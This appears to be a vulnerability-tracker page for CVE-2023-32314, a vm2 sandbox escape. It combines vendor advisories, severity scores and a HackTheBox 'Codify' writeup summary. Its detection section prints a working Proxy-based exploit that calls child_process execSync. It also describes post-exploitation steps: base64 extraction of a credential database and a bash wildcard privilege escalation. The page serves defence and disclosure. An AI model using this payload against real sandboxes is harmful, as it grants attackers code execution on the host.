CVE-2023-32314
published 2023-05-15CVE-2023-32314: vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including…
PriorityP273critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
5.60%
91.9th percentile
vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| patriksimek | vm2 | < 3.9.18 | 3.9.18 |
| vm2_project | vm2 | < 3.9.18 | 3.9.18 |
| vm2_project | vm2 | >= 0 < 3.9.18 | 3.9.18 |
Detection & IOCsextracted from sources · hover to see the quote
commandconst err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("ping -c1 10.10.14.14").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}↗
- →CVE-2023-32314 exploit abuses Proxy-based host object creation in vm2 ≤3.9.17; detect JavaScript payloads calling `args.constructor.constructor("return process")()` within vm2 sandbox contexts to identify sandbox escape attempts. ↗
- →Monitor for `process.mainModule.require("child_process").execSync(...)` patterns in code submitted to vm2-backed Node.js sandboxes (e.g., on port 3000), as this is the RCE execution chain used post-escape. ↗
- →Alert on `base64 -w0 /var/www/contact/tickets.db` or similar base64 exfiltration commands executed on the host, indicating post-exploitation data theft of the SQLite credential store. ↗
- →Detect bash glob/wildcard injection against scripts using unquoted `==` comparisons in `[[ ]]` conditionals (e.g., supplying `a*` as input) — a privilege escalation technique used against `/opt/scripts/mysql-backup.sh` running as root. ↗
- ·The vm2 sandbox escape (CVE-2023-32314) affects all versions up to and including 3.9.17; version 3.9.18 contains the patch. The observed vulnerable deployment used version 3.9.16. ↗
- ·No known workarounds exist for CVE-2023-32314; upgrading to vm2 ≥3.9.18 is the only remediation. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
vm2 Sandbox Escape vulnerability
ghsa·2023-05-15
CVE-2023-32314 [CRITICAL] CWE-74 vm2 Sandbox Escape vulnerability
vm2 Sandbox Escape vulnerability
A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`.
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.18` of `vm2`.
### Workarounds
None.
### References
PoC - https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [VM2](https://github.com/patriksimek/vm2)
Thanks to @arkark (Takeshi Kaneko) of GMO Cybersecurity by Ierae, Inc. for disclosing this vulnerability.
OSV
vm2 Sandbox Escape vulnerability
osv·2023-05-15
CVE-2023-32314 [CRITICAL] vm2 Sandbox Escape vulnerability
vm2 Sandbox Escape vulnerability
A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`.
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.18` of `vm2`.
### Workarounds
None.
### References
PoC - https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [VM2](https://github.com/patriksimek/vm2)
Thanks to @arkark (Takeshi Kaneko) of GMO Cybersecurity by Ierae, Inc. for disclosing this vulnerability.
Red Hat
vm2: Sandbox Escape
vendor_redhat·2023-05-15·CVSS 9.8
CVE-2023-32314 [CRITICAL] CWE-915 vm2: Sandbox Escape
vm2: Sandbox Escape
vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.
A flaw was found in the vm2 sandbox. When a host object is created based on the specification of Proxy, an attacker can bypass the sandbox protections. This may allow an attacker to run remote code execution on the host running the san
No detection rules found.
No public exploits indexed.
CTF
Codify / README
ctf_writeups·CVSS 9.8
CVE-2023-32314 [CRITICAL] Codify / README
# Codify - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, `80`, and `3000`.
***User***: Discovered a website designed for testing NodeJS code utilizing `vm2`. Exploited `CVE-2023-32314` to escape the sandbox of `vm2` and achieve Remote Code Execution (RCE). This led to the discovery of the file `tickets.db`, which contains the hashed password of the `joshua` user.
***Root***: Identified the ability to execute the `/opt/scripts/mysql-backup.sh` script as `root`. Leveraged bash partial string matching to circumvent the if statement check within the script. Developed a Python script to retrieve the `root` password utilizing partial string matching.
## Codify Solution
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5achttps://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912dafhttps://github.com/patriksimek/vm2/releases/tag/3.9.18https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5achttps://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912dafhttps://github.com/patriksimek/vm2/releases/tag/3.9.18https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5
2023-05-15
Published